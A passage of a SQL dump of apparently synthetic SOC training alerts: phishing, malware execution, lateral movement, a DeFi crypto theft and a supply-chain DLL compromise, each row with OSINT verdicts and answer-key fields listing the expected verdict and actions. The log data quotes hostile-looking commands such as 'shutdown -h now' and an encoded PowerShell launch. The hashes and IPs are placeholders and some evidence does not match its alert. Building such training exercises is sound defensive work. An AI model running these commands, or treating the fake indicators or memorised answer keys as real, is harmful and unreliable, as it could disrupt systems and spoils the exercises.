2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(273, 'Malware Detected: Suspicious Process Execution on Host', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'INTERNAL-PC01\' originating from an external IP known for malicious activity. The hash of the file matches a known malware sample.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malware.exe\"}', '2025-12-31 13:30:07', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample \'Trojan.Generic\'\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as the process executed matches a known malware signature and originates from a malicious IP. 
Immediate action is required to contain the threat.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(274, 'Phishing Attempt via Weaponized Job Offers', 'medium', 'Email Gateway', 'The Lazarus Group has sent a phishing email to a developer at the company, masquerading as a recruiter with a lucrative job offer. The email contains a malicious attachment designed to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 34, '{\"timestamp\":\"2023-09-25T13:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_from\":\"recruiter@example.com\",\"email_to\":\"dev.user@company.com\",\"subject\":\"Exciting Job Opportunity!\",\"attachment_name\":\"JobOffer.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Email Received\"}', '2025-12-31 13:43:07', '2026-02-18 07:29:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruiter@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain has been reported in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"JobOffer.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macros used for credential harvesting\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious document containing 
macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"recruiter@example.com\",\"to\":\"dev.user@company.com\",\"subject\":\"Exciting Job Opportunity!\",\"date\":\"2023-09-25T13:45:00Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"JobOffer.docm\",\"size\":\"1.2MB\",\"type\":\"application/vnd.ms-word.document.macroEnabled.12\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear Developer, we have an exciting job opportunity for you. Please review the attached offer...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(275, 'Malicious Code Execution on Developer Systems', 'high', 'EDR', 'Malicious code executed on developer systems following a successful phishing attack, providing attackers access to the DeFi platform\'s development environment.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_id\":\"4567\",\"event_type\":\"process_creation\",\"user\":\"dev_user01\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\"}}', '2025-12-31 13:43:07', '2026-02-18 07:29:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_user01\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on the development system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s machine.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to execute 
malicious commands.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(276, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'Attackers are using compromised credentials to move laterally within the DeFi platform\'s network, aiming to escalate privileges and maintain access across critical systems.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"method\":\"SMB\",\"file_transferred\":\"persistence_tool.exe\",\"hash\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"action\":\"Successful Authentication\",\"protocol\":\"SMB\",\"severity\":\"High\"}', '2025-12-31 13:43:07', '2026-02-18 07:30:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP known for malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal user database\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"persistence_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File used for establishing persistence within the 
network.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash lookup\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(277, 'Cryptocurrency Exfiltration and Laundering', 'critical', 'Blockchain Analysis', 'The operation culminates in the transfer of $600 million worth of cryptocurrency from the DeFi platform’s wallets. The attackers employ mixer services to launder the funds, making tracking and recovery efforts challenging.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"evt-2023-cryptoxfil-004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"transaction_id\":\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\",\"transfer_amount\":\"600000000\",\"currency\":\"USD\",\"destination_address\":\"1MixerServiceX1yZ3w4V5\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"attacker@malicious.com\",\"filename\":\"exfil_transaction_details.csv\"}', '2025-12-31 13:43:07', '2026-02-18 07:31:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known cybercrime activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"malicious\",\"details\":\"Hash used in fraudulent transaction.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email linked to multiple phishing 
campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exfil_transaction_details.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(278, 'Compromised Update Detected', 'high', 'Software Update Logs', 'A malicious DLL was detected within a signed update package of the server management software. The package was distributed to users, potentially granting attackers initial access.', 'Malware', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-14T12:34:56Z\",\"event_id\":\"update_12345\",\"update_source\":\"server_mgmt_software\",\"update_version\":\"v3.2.1\",\"affected_component\":\"lib_mgmt.dll\",\"malicious_hash\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"signed_cert\":\"CN=ServerMgmt, O=TrustedSoftware Inc.\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"admin_user\",\"filename\":\"lib_mgmt.dll\"}', '2025-12-31 13:45:44', '2026-02-18 07:33:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a malware distribution campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lib_mgmt.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"internal\",\"details\":\"Filename matches legitimate component, but altered.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Authorized user for software management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(279, 'Execution of Malicious Code', 'high', 'Endpoint Detection and Response (EDR)', 'Once the update is installed, the malicious DLL executes its payload, allowing the attacker to establish an initial presence within the network.', 'Execution', 'T1218.011 - System Binary Proxy Execution: Rundll32', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"EDR-EXEC-20231005-143\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\malicious.dll\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"action\":\"Execute\",\"outcome\":\"Success\",\"additional_info\":\"The DLL was executed remotely via rundll32.exe, establishing a reverse shell.\"}', '2025-12-31 13:45:44', '2026-02-18 07:34:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple engines as a 